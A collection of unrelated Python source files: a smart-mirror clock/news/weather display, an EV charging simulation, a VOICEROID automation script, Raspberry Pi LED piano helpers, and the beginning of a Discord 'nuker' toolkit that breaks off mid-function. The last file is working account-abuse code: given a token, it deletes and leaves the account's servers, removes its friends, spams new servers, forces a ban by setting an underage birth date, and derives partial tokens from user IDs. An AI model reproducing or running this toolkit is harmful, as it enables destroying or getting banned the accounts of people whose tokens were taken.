date2 = time.strftime(date_format)
# if time string has changed, update it
if time2 != self.time1:
self.time1 = time2
self.timeLbl.config(text=time2)
if day_of_week2 != self.day_of_week1:
self.day_of_week1 = day_of_week2
self.dayOWLbl.config(text=day_of_week2)
if date2 != self.date1:
self.date1 = date2
self.dateLbl.config(text=date2)
self.timeLbl.after(200, self.tick) #Calls itself every 200 millisecond
class News(Frame):
def __init__(self, parent, *args, **kwargs):
Frame.__init__(self, parent, *args, **kwargs)
self.config(bg=background_color)
self.title = 'Hot news in ' + news_country_code
self.newsLbl = Label(self, text=self.title, font=(text_font, medium_text_size), fg=text_color,
bg=background_color)
self.newsLbl.pack(side=TOP, anchor=W)
self.headlinesContainer = Frame(self, bg=background_color)
self.headlinesContainer.pack(side=TOP)
self.get_headlines()
def get_headlines(self):
try:
for widget in self.headlinesContainer.winfo_children(): #It removes the previous news widgets
widget.destroy()
if news_country_code is None:
headlines_url = "https://news.google.com/news?ned=us&output=rss"
else:
headlines_url = "https://news.google.com/news?ned=%s&output=rss" + news_country_code
feed = feedparser.parse(headlines_url)
for post in feed.entries[0:5]:
headline = NewsHeadline(self.headlinesContainer, post.title)
headline.pack(side=TOP, anchor=W)
except:
print("Error: Cannot get news.")
self.after(600000, self.get_headlines)
class NewsHeadline(Frame):
def __init__(self, parent, event_name=""):
Frame.__init__(self, parent, bg=background_color)
image = Image.open("assets/Newspaper.png")
image = image.resize((25, 25), Image.ANTIALIAS)
image = image.convert('RGB')
photo = ImageTk.PhotoImage(image)
self.iconLbl = Label(self, bg=background_color, image=photo)
self.iconLbl.image = photo
self.iconLbl.pack(side=LEFT, anchor=N)
self.eventName = event_name
self.eventNameLbl = Label(self, text=self.eventName, font=(text_font, xsmall_text_size), fg=text_color,
bg=background_color)
self.eventNameLbl.pack(side=LEFT, anchor=N)
class FullscreenWindow:
def __init__(self):
self.tk = Tk()
self.tk.configure(background=background_color)
self.topFrame = Frame(self.tk, background=background_color)
self.bottomFrame = Frame(self.tk, background=background_color)
self.topFrame.pack(side=TOP, fill=BOTH, expand=YES)
self.bottomFrame.pack(side=BOTTOM, fill=BOTH, expand=YES)
self.state = True
self.tk.bind("<F11>", self.toggle_fullscreen)
self.tk.config(cursor='none')
# clock
self.clock = Clock(self.topFrame)
self.clock.pack(side=LEFT, anchor=N, padx=0, pady=0)
# weather
self.weather = Weather(self.topFrame)
self.weather.pack(side=RIGHT, anchor=N, padx=0, pady=0)
# news
self.news = News(self.bottomFrame)
self.news.pack(side=LEFT, anchor=S, padx=0, pady=0)
def toggle_fullscreen(self, event=None):
self.state = not self.state # Just toggling the boolean
self.tk.attributes("-fullscreen", self.state)
return "break"
class Weather(Frame):
def __init__(self, parent, *args, **kwargs):
Frame.__init__(self, parent, bg=background_color)
self.temperature = ''
self.currently = ''
self.icon = ''
self.degreeFrm = Frame(self, bg=background_color)
self.degreeFrm.pack(side=TOP, anchor=W)
self.temperatureLbl = Label(self.degreeFrm, font=(text_font, xlarge_text_size), fg=text_color,
bg=background_color)
self.temperatureLbl.pack(side=LEFT, anchor=E)
self.iconLbl = Label(self, bg=background_color)
self.iconLbl.pack(side=RIGHT, anchor=E, padx=20)
self.currentlyLbl = Label(self, font=(text_font, medium_text_size), fg=text_color, bg=background_color)
self.currentlyLbl.pack(side=RIGHT, anchor=E)
self.get_weather()
def get_weather(self):
try:
resp = requests.get(
'http://api.openweathermap.org/data/2.5/weather?id=' + weather_city_id
+ '&units='
+ weather_unit
+ '&appid='
+ weather_api_token)
temp = resp.json()
pprint.PrettyPrinter(indent=4).pprint(temp)
self.degree_sign = u"\N{DEGREE SIGN}"
temperature = temp['main']['temp'], self.degree_sign
current = temp['weather'][0]['main']
icon = temp['weather'][0]['icon']
icon2 = icon_lookup[icon]
print(icon2)
image = Image.open(icon2)
image = image.resize((100, 100), Image.ANTIALIAS)
photo = ImageTk.PhotoImage(image)
self.iconLbl.config(image=photo)
self.iconLbl.image = photo
self.temperatureLbl.config(text=temperature)
self.currentlyLbl.config(text=current)
except:
print ("No internet, cannot get weather.")
self.after(600000, self.get_weather)
def motion():
os.system('python motion.py')
def humid():
os.system('python humid.py')
if __name__ == '__main__':
mirror = FullscreenWindow()
mirror.tk.title("SmartMirror")
mirror.tk.attributes("-fullscreen", True)
Thread(target = motion).start() #starts the motion sensor in another thread
Thread(target = humid).start() #starts the humidity sensor in another thread
mirror.tk.mainloop()
|
uncontrolled.py
|
from multiprocessing import Process, Queue
import chargingmodel.preprocessing as preprocessing
import chargingmodel.optimize as optimize
import chargingmodel.tools as tools
# Uncontrolled charging.
# Every agent charges immediately and as much as possible after arriving at a charging station.
# Runs for all regions in parrallel.
def run(*, scenario, config, dbName, regionIDs, aggFactors, n_worker, verbose):
queue = Queue()
currentWork = []
for i, regionID in enumerate(regionIDs):
# Preprocess data
agents = preprocessing.getAgents(scenario, config, regionID, aggFac=aggFactors[i])
# Create process
kwargs = {"agents": agents, "config": config,
"queue": queue}
p = Process(target=runCounty, name=str(regionID),
kwargs=kwargs)
currentWork.append(p)
# Run porcesses, will wait for all to complete
if len(currentWork) >= n_worker:
results = tools.runProcesses(currentWork, verbose, queue)
currentWork = []
for result in results:
tools.saveDB(agents=result[0], demands=result[1], slacks=result[2], dbName=dbName)
# Run remaining processes
if currentWork:
results = tools.runProcesses(currentWork, verbose, queue)
for result in results:
tools.saveDB(agents=result[0], demands=result[1], slacks=result[2], dbName=dbName)
def runCounty(*, agents, config, queue):
demands, slacks = optimize.immediate(agents=agents,
eta=config["chargingEfficiency"],
SOCStart=config["SOCStart"],
deltaT=0.25)
queue.put((agents, demands, slacks))
|
kiritan.py
|
# coding: UTF-8
import os
import sys
import time
import hashlib
import logging
import threading
import subprocess
from win32con import *
from win32gui import *
from win32process import *
# 共通設定
waitSec = 0.1
windowName = "VOICEROID+ 東北きりたん EX"
# WAV生成(排他)
lock = threading.Lock()
def talk(input):
with lock:
return generate_wav(input)
# 子ウィンドウの検索
def enum_child_windows(window):
result = []
def callback(hwnd, param):
result.append((hwnd, GetClassName(hwnd), GetWindowText(hwnd)))
EnumChildWindows(window, callback, None)
return result
# VOICELOIDを操作してWAV生成
def generate_wav(inputText):
# 空文字列は拒否
inputText = inputText.strip()
if inputText == "":
return None
# 出力先ディレクトリ作成
outdir = "./output/"
try:
os.mkdir(outdir)
except:
pass
# ファイルが存在してたらやめる
outfile = os.path.abspath(outdir + hashlib.md5(inputText.encode("utf-8")).hexdigest() + ".wav")
if os.path.exists(outfile):
return outfile
logging.info("Generating WAV")
while True:
# VOICEROIDプロセスを探す
window = FindWindow(None, windowName) or FindWindow(None, windowName + "*")
if window:
break
# 見つからなかったらVOICEROIDを起動
subprocess.Popen(["C:\Program Files (x86)\AHS\VOICEROID+\KiritanEX\VOICEROID.exe"])
time.sleep(32 * waitSec)
while True:
# ダイアログが出ていたら閉じる
errorDialog = FindWindow(None, "エラー") or FindWindow(None, "注意") or FindWindow(None, "音声ファイルの保存")
if errorDialog:
SendMessage(errorDialog, WM_CLOSE, 0, 0)
time.sleep(waitSec)
else:
break
# 最前列に持ってくる
SetWindowPos(window, HWND_TOPMOST, 0, 0, 0, 0, SWP_SHOWWINDOW | SWP_NOMOVE | SWP_NOSIZE)
# VOICEROID操作(保存ダイアログを出すまで)
def __req_speech():
for hwnd, className, windowText in enum_child_windows(window):
# テキストを入力する
if className.count("RichEdit20W"):
SendMessage(hwnd, WM_SETTEXT, 0, inputText)
if windowText.count("音声保存"):
# 最小化解除
ShowWindow(window, SW_SHOWNORMAL)
# 保存ボタンを押す
SendMessage(hwnd, WM_LBUTTONDOWN, MK_LBUTTON, 0)
SendMessage(hwnd, WM_LBUTTONUP, 0, 0)
# 別スレッドで実行(保存ダイアログを出すとSendMessageがブロックする)
threading.Thread(target=__req_speech).start()
# 保存ダイアログを探す
while True:
dialog = FindWindow(None, "音声ファイルの保存")
if dialog:
break
time.sleep(waitSec)
# 保存ボタンを押す
while FindWindow(None, "音声ファイルの保存"):
for hwnd, className, windowText in enum_child_windows(dialog):
# ファイル名を入力
if className.count("Edit"):
SendMessage(hwnd, WM_SETTEXT, 0, outfile)
# 保存ボタンを押す
if windowText.count("保存"):
SendMessage(hwnd, WM_LBUTTONDOWN, MK_LBUTTON, 0)
SendMessage(hwnd, WM_LBUTTONUP, 0, 0)
time.sleep(waitSec)
# プログレスダイアログが表示されている間は待つ
while FindWindow(None, "音声保存"):
time.sleep(waitSec)
# txtが存在していたら消す
try:
os.remove(outfile.replace("wav", "txt"))
except:
pass
return outfile
|
functions.py
|
import math
import threading
from neopixel import *
import mido
import datetime
import psutil
import time
import socket
import RPi.GPIO as GPIO
def get_ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
local_ip = s.getsockname()[0]
s.close()
return local_ip
def find_between(s, start, end):
try:
return (s.split(start))[1].split(end)[0]
except:
return False
def clamp(val, val_min, val_max):
return max(val_min, min(val, val_max))
def shift(l, n):
return l[n:] + l[:n]
def play_midi(song_path, midiports, saving, menu, ledsettings, ledstrip):
#commented parts are for benchmarking
midiports.pending_queue.append(mido.Message('note_on'))
if song_path in saving.is_playing_midi.keys():
menu.render_message(song_path, "Already playing", 2000)
return
saving.is_playing_midi.clear()
saving.is_playing_midi[song_path] = True
menu.render_message("Playing: ", song_path, 2000)
saving.t = threading.currentThread()
try:
mid = mido.MidiFile("Songs/" + song_path)
fastColorWipe(ledstrip.strip, True, ledsettings)
#length = mid.length
t0 = False
total_delay = 0
# notes_count = 0
delay = 0
# message_to_print = ''
for message in mid:
if song_path in saving.is_playing_midi.keys():
if not t0:
t0 = time.time()
# if(notes_count >= 100):
# notes_count = 0
# print(repr(message_to_print))
# message_to_print = ''
# notes_count += 1
total_delay += message.time
current_time = (time.time() - t0) + message.time
drift = total_delay - current_time
if (drift < 0):
delay = message.time + drift
else:
delay = message.time
if(delay < 0):
delay = 0
#message_to_print += "\n Message: "+str(message)+" Total delay: "+str(total_delay)+" current_time: "+str(current_time)+' message time: ' + str(message.time) + ' actual delay: ' + str(
#delay) + ' drift: ' + str(drift)
if delay > 0:
time.sleep(delay)
if not message.is_meta:
midiports.playport.send(message)
midiports.pending_queue.append(message.copy(time=0))
else:
break
print('play time: {:.2f} s (expected {:.2f})'.format(time.time() - t0, total_delay))
#print('play time: {:.2f} s (expected {:.2f})'.format(time.time() - t0, length))
# saving.is_playing_midi = False
except:
menu.render_message(song_path, "Can't play this file", 2000)
saving.is_playing_midi.clear()
for i in range(ledstrip.strip.numPixels()):
ledstrip.strip.setPixelColor(i, Color(0, 0, 0))
def screensaver(menu, midiports, saving, ledstrip):
KEY2 = 20
GPIO.setup(KEY2, GPIO.IN, GPIO.PUD_UP)
delay = 0.1
interval = 3 / float(delay)
i = 0
cpu_history = [None] * int(interval)
cpu_chart = [0] * 28
cpu_average = 0
upload = 0
download = 0
upload_start = 0
download_start = 0
local_ip = 0
if menu.screensaver_settings["local_ip"] == "1":
local_ip = get_ip_address()
try:
midiports.inport.poll()
except:
pass
while True:
if (time.time() - saving.start_time) > 3600 and delay < 0.5 and menu.screensaver_is_running == False:
delay = 0.9
interval = 5 / float(delay)
cpu_history = [None] * int(interval)
cpu_average = 0
i = 0
if int(menu.screen_off_delay) > 0 and ((time.time() - saving.start_time) > (int(menu.screen_off_delay) * 60)):
menu.screen_status = 0
GPIO.output(24, 0)
if int(menu.led_animation_delay) > 0 and ((time.time() - saving.start_time) > (
int(menu.led_animation_delay) * 60)) and menu.screensaver_is_running == False:
menu.screensaver_is_running = True
if menu.led_animation == "Theater Chase":
menu.t = threading.Thread(target=theaterChase, args=(ledstrip.strip, 1))
menu.t.start()
if menu.led_animation == "Breathing Slow":
menu.t = threading.Thread(target=breathing, args=(ledstrip.strip, 25))
menu.t.start()
if menu.led_animation == "Rainbow Slow":
menu.t = threading.Thread(target=rainbow, args=(ledstrip.strip, 10))
menu.t.start()
if menu.led_animation == "Rainbow Cycle Slow":
menu.t = threading.Thread(target=rainbowCycle, args=(ledstrip.strip, 10))
menu.t.start()
if menu.led_animation == "Theater Chase Rainbow":
menu.t = threading.Thread(target=theaterChaseRainbow, args=(ledstrip.strip, 5))
menu.t.start()
if menu.led_animation == "Sound of da police":
menu.t = threading.Thread(target=sound_of_da_police, args=(ledstrip.strip, 1))
menu.t.start()
if menu.led_animation == "Scanner":
menu.t = threading.Thread(target=scanner, args=(ledstrip.strip, 1))
menu.t.start()
hour = datetime.datetime.now().strftime("%H:%M:%S")
date = datetime.datetime.now().strftime("%d-%m-%Y")
cpu_usage = psutil.cpu_percent()
cpu_history[i] = cpu_usage
cpu_chart.append(cpu_chart.pop(0))
cpu_chart[27] = cpu_usage
if i >= (int(interval) - 1):
i = 0
try:
cpu_average = sum(cpu_history) / (float(len(cpu_history) + 1))
last_cpu_average = cpu_average
except:
cpu_average = last_cpu_average
if menu.screensaver_settings["ram"] == "1":
ram_usage = psutil.virtual_memory()[2]
else:
ram_usage = 0
if menu.screensaver_settings["temp"] == "1":
try:
temp = find_between(str(psutil.sensors_temperatures()["cpu_thermal"]), "current=", ",")
except:
temp = find_between(str(psutil.sensors_temperatures()["cpu-thermal"]), "current=", ",")
temp = round(float(temp), 1)
else:
temp = 0
if menu.screensaver_settings["network_usage"] == "1":
upload_end = psutil.net_io_counters().bytes_sent
download_end = psutil.net_io_counters().bytes_recv
if upload_start:
upload = upload_end - upload_start
upload = upload * (1 / delay)
upload = upload / 1000000
upload = round(upload, 2)
if download_start:
download = download_end - download_start
download = download * (1 / delay)
download = download / 1000000
download = round(download, 2)
upload_start = upload_end
download_start = download_end
else:
upload = 0
download = 0
if menu.screensaver_settings["sd_card_space"] == "1":
card_space = psutil.disk_usage('/')
else:
card_space = 0
menu.render_screensaver(hour, date, cpu_usage, round(cpu_average, 1), ram_usage, temp, cpu_chart, upload,
download, card_space, local_ip)
time.sleep(delay)
i += 1
try:
if str(midiports.inport.poll()) != "None":
menu.screensaver_is_running = False
saving.start_time = time.time()
menu.screen_status = 1
GPIO.output(24, 1)
menu.show()
midiports.reconnect_ports()
midiports.last_activity = time.time()
break
except:
pass
if GPIO.input(KEY2) == 0:
menu.screensaver_is_running = False
saving.start_time = time.time()
menu.screen_status = 1
GPIO.output(24, 1)
menu.show()
midiports.reconnect_ports()
break
# Get note position on the strip
def get_note_position(note, ledstrip):
note_offset = 0
if note > 27:
note_offset = math.ceil((note - 27)/14)
note_offset -= ledstrip.shift
note_pos_raw = 2 * (note - 20) - note_offset
if ledstrip.reverse:
return max(0, ledstrip.led_number - note_pos_raw)
else:
return max(0, note_pos_raw)
# scale: 1 means in C, scale: 2 means in C#, scale: 3 means in D, etc...
def get_scale_color(scale, note_position, ledsettings):
notes_in_scale = [0, 2, 4, 5, 7, 9, 11]
scale = int(scale)
note_position = (note_position - scale) % 12
if note_position in notes_in_scale:
return list(ledsettings.key_in_scale.values())
else:
return list(ledsettings.key_not_in_scale.values())
def get_rainbow_colors(pos, color):
pos = int(pos)
if pos < 85:
if color == "green":
return pos * 3
elif color == "red":
return 255 - pos * 3
elif color == "blue":
return 0
elif pos < 170:
pos -= 85
if color == "green":
return 255 - pos * 3
elif color == "red":
return 0
elif color == "blue":
return pos * 3
else:
pos -= 170
if color == "green":
return 0
elif color == "red":
return pos * 3
elif color == "blue":
return 255 - pos * 3
# LED animations
def fastColorWipe(strip, update, ledsettings):
brightness = ledsettings.backlight_brightness_percent / 100
red = int(ledsettings.get_backlight_color("Red") * brightness)
green = int(ledsettings.get_backlight_color("Green") * brightness)
blue = int(ledsettings.get_backlight_color("Blue") * brightness)
color = Color(green, red, blue)
for i in range(strip.numPixels()):
strip.setPixelColor(i, color)
if update:
strip.show()
def theaterChase(strip, color, ledsettings, menu, wait_ms=25):
"""Movie theater light style chaser animation."""
menu.screensaver_is_running = False
time.sleep(0.5)
if menu.screensaver_is_running:
return
menu.t = threading.currentThread()
j = 0
menu.screensaver_is_running = True
while menu.screensaver_is_running:
red = int(ledsettings.get_color("Red"))
green = int(ledsettings.get_color("Green"))
blue = int(ledsettings.get_color("Blue"))
for q in range(5):
for i in range(0, strip.numPixels(), 5):
strip.setPixelColor(i + q, Color(green, red, blue))
strip.show()
time.sleep(wait_ms / 1000.0)
for i in range(0, strip.numPixels(), 5):
strip.setPixelColor(i + q, 0)
j += 1
if j > 256:
j = 0
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
def wheel(pos):
"""Generate rainbow colors across 0-255 positions."""
if pos < 85:
return Color(pos * 3, 255 - pos * 3, 0)
elif pos < 170:
pos -= 85
return Color(255 - pos * 3, 0, pos * 3)
else:
pos -= 170
return Color(0, pos * 3, 255 - pos * 3)
def rainbow(strip, ledsettings, menu, wait_ms=20):
"""Draw rainbow that fades across all pixels at once."""
menu.screensaver_is_running = False
time.sleep(0.2)
if menu.screensaver_is_running:
return
fastColorWipe(strip, True, ledsettings)
menu.t = threading.currentThread()
j = 0
menu.screensaver_is_running = True
while menu.screensaver_is_running:
for i in range(strip.numPixels()):
strip.setPixelColor(i, wheel(j & 255))
j += 1
if j >= 256:
j = 0
strip.show()
time.sleep(wait_ms / 1000.0)
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
def rainbowCycle(strip, ledsettings, menu, wait_ms=20):
"""Draw rainbow that uniformly distributes itself across all pixels."""
menu.screensaver_is_running = False
time.sleep(0.2)
if menu.screensaver_is_running:
return
fastColorWipe(strip, True, ledsettings)
menu.t = threading.currentThread()
j = 0
menu.screensaver_is_running = True
while menu.screensaver_is_running:
for i in range(strip.numPixels()):
strip.setPixelColor(i, wheel((int(i * 256 / strip.numPixels()) + j) & 255))
j += 1
if j >= 256:
j = 0
strip.show()
time.sleep(wait_ms / 1000.0)
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
def theaterChaseRainbow(strip, ledsettings, menu, wait_ms=25):
"""Rainbow movie theater light style chaser animation."""
menu.screensaver_is_running = False
time.sleep(0.5)
if menu.screensaver_is_running:
return
fastColorWipe(strip, True, ledsettings)
menu.t = threading.currentThread()
j = 0
menu.screensaver_is_running = True
while menu.screensaver_is_running:
for q in range(5):
for i in range(0, strip.numPixels(), 5):
strip.setPixelColor(i + q, wheel((i + j) % 255))
strip.show()
time.sleep(wait_ms / 1000.0)
for i in range(0, strip.numPixels(), 5):
strip.setPixelColor(i + q, 0)
j += 1
if j > 256:
j = 0
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
def breathing(strip, ledsettings, menu, wait_ms=2):
menu.screensaver_is_running = False
time.sleep(0.1)
if menu.screensaver_is_running:
return
fastColorWipe(strip, True, ledsettings)
menu.t = threading.currentThread()
menu.screensaver_is_running = True
multiplier = 24
direction = 2
while menu.screensaver_is_running:
if multiplier >= 98 or multiplier < 24:
direction *= -1
multiplier += direction
divide = multiplier / float(100)
red = int(round(float(ledsettings.get_color("Red")) * float(divide)))
green = int(round(float(ledsettings.get_color("Green")) * float(divide)))
blue = int(round(float(ledsettings.get_color("Blue")) * float(divide)))
for i in range(strip.numPixels()):
strip.setPixelColor(i, Color(green, red, blue))
strip.show()
if wait_ms > 0:
time.sleep(wait_ms / 1000.0)
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
def sound_of_da_police(strip, ledsettings, menu, wait_ms=5):
menu.screensaver_is_running = False
time.sleep(0.1)
if menu.screensaver_is_running:
return
fastColorWipe(strip, True, ledsettings)
menu.t = threading.currentThread()
menu.screensaver_is_running = True
middle = strip.numPixels() / 2
r_start = 0
l_start = 196
while menu.screensaver_is_running:
r_start += 14
l_start -= 14
for i in range(strip.numPixels()):
if (i > middle) and i > r_start and i < (r_start + 40):
strip.setPixelColor(i, Color(0, 255, 0))
elif (i < middle) and i < l_start and i > (l_start - 40):
strip.setPixelColor(i, Color(0, 0, 255))
else:
strip.setPixelColor(i, Color(0, 0, 0))
if r_start > 150:
r_start = 0
l_start = 175
strip.show()
time.sleep(wait_ms / 1000.0)
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
def scanner(strip, ledsettings, menu, wait_ms=1):
menu.screensaver_is_running = False
time.sleep(0.1)
if menu.screensaver_is_running:
return
fastColorWipe(strip, True, ledsettings)
menu.t = threading.currentThread()
menu.screensaver_is_running = True
position = 0
direction = 3
scanner_length = 20
red_fixed = ledsettings.get_color("Red")
green_fixed = ledsettings.get_color("Green")
blue_fixed = ledsettings.get_color("Blue")
while menu.screensaver_is_running:
position += direction
for i in range(strip.numPixels()):
if i > (position - scanner_length) and i < (position + scanner_length):
distance_from_position = position - i
if distance_from_position < 0:
distance_from_position *= -1
divide = ((scanner_length / 2) - distance_from_position) / float(scanner_length / 2)
red = int(float(red_fixed) * float(divide))
green = int(float(green_fixed) * float(divide))
blue = int(float(blue_fixed) * float(divide))
if divide > 0:
strip.setPixelColor(i, Color(green, red, blue))
else:
strip.setPixelColor(i, Color(0, 0, 0))
if position >= strip.numPixels() or position <= 1:
direction *= -1
strip.show()
time.sleep(wait_ms / 1000.0)
menu.screensaver_is_running = False
fastColorWipe(strip, True, ledsettings)
|
NyxunToolKit-Nuker.py
|
import requests
import discord
import os
import sys
import colorama
import threading
from itertools import cycle
from datetime import datetime
from colorama import Fore, init, Style
import ctypes
import urllib
import time
import json
import random
import string
import itertools
from re import findall
import json
import platform as plt
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
from itertools import cycle
import base64
from random import randint
from time import gmtime, sleep, strftime
from discord.ext import commands
from discord.ext.commands import Bot
import keyboard
import aiohttp
import re, os
from re import findall
import json
import platform as plt
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
import psutil
#snipper
def Spinner():
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Loading')
os.system('cls')
l = ['|', '/', '-', '\\']
for i in l+l+l+l+l+l+l+l+l+l+l+l+l:
sys.stdout.write('\r' + f'{Fore.CYAN}{Style.BRIGHT}[*] Loading... '+i)
sys.stdout.flush()
time.sleep(0.2)
Spinner()
#start of methods
def nuketoken():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Nuke Token')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
amount = int(input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Guild Amount: '))
name = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Guild Name: ')
print('')
print('')
print(f'{Fore.GREEN}Token is valid.{Fore.RESET}')
try:
bot = commands.Bot(command_prefix='-', self_bot=True)
bot.remove_command("help")
@bot.event
async def on_ready(times : int=100):
print("Leaving Guilds")
for guild in bot.guilds:
try:
await guild.leave()
print(f'Left: [{guild.name}]')
except:
print(f'Failed: [{guild.name}]')
print("")
print("Deleting Guilds")
for guild in bot.guilds:
try:
await guild.delete()
print(f'Deleted Guild: [{guild.name}]')
except:
print(f'Failed: [{guild.name}]')
print("")
print("Removing Relationships")
for user in bot.user.friends:
try:
await user.remove_friend()
print(f'Removed Relationship: {user}')
except:
print(f"Failed: {user}")
print("")
print("Creating Guilds")
for i in range(amount):
await bot.create_guild(f'{name}', region=None, icon=None)
print(f'Server Created: [{i}]')
print("")
print(f'{Fore.GREEN}Successfully nuked token{Fore.RESET}')
input(f'Press [Enter] key to go back to Main Menu.')
mainMenu()
bot.run(token, bot=False)
except ValueError:
print(f'{Fore.RED}Invalid choice{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Invalid token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def unverifytoken():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Unverify Token')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
r = requests.post('https://discordapp.com/api/v8/users/@me/relationships', headers={'Authorization': token, 'User-Agent': 'discordbot'}, json={'username': 'LMAO', 'discriminator': 6572})
if r.status_code == 204:
print(f'{Fore.GREEN}Successfully unverified token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Failed to unverify token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Invalid token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def bantoken():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Ban Token')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
r = requests.patch('https://discordapp.com/api/v8/users/@me', headers={'Authorization': token}, json={'date_of_birth': '2015-7-16'})
if r.status_code == 400:
print(f'{Fore.GREEN}Successfully banned token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Failed to ban token{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Invalid token{Fore.RESET}')
input('Press [Enter] key to go back to Main Menu.')
mainMenu()
os.system('cls')
def tokenfromuserid():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Half Token From User ID')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
userid = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} ID: ')
string_b = f"{userid}".encode('utf')
bas64_bytes = base64.b64encode(string_b)
print(bas64_bytes.decode('utf-8'))
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def tokenvalidator():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Token Validator')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
{Fore.LIGHTWHITE_EX}╚═╝└┴┘ ╩ └─┘└─┘┴─┘╩ ╩┴ ┴
''')
token = input(f'\u001b[38;5;93m:\u001b[38;5;15m>\u001b[38;5;93m:{Fore.RESET} Token: ')
headers = {'Authorization': token, 'Content-Type': 'application/json'}
r = requests.get('https://discord.com/api/v8/users/@me', headers=headers)
if r.status_code == 200:
print(f'{Fore.GREEN}Token valid{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
else:
print(f'{Fore.RED}Invalid token.{Fore.RESET}')
print(f'Press [Enter] key to go back to Main Menu.')
while True:
if keyboard.is_pressed('enter'):
os.system('cls')
mainMenu()
def hypesquad():
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'[OwKit] Made by Monster CAT | Hypesquad Changer')
print(f'''
{Fore.MAGENTA}╔═╗┬ ┬╔╦╗┌─┐┌─┐┬ ╦╔═┬┌┬┐
{Fore.LIGHTMAGENTA_EX}║ ║│││ ║ │ ││ ││ ╠╩╗│ │
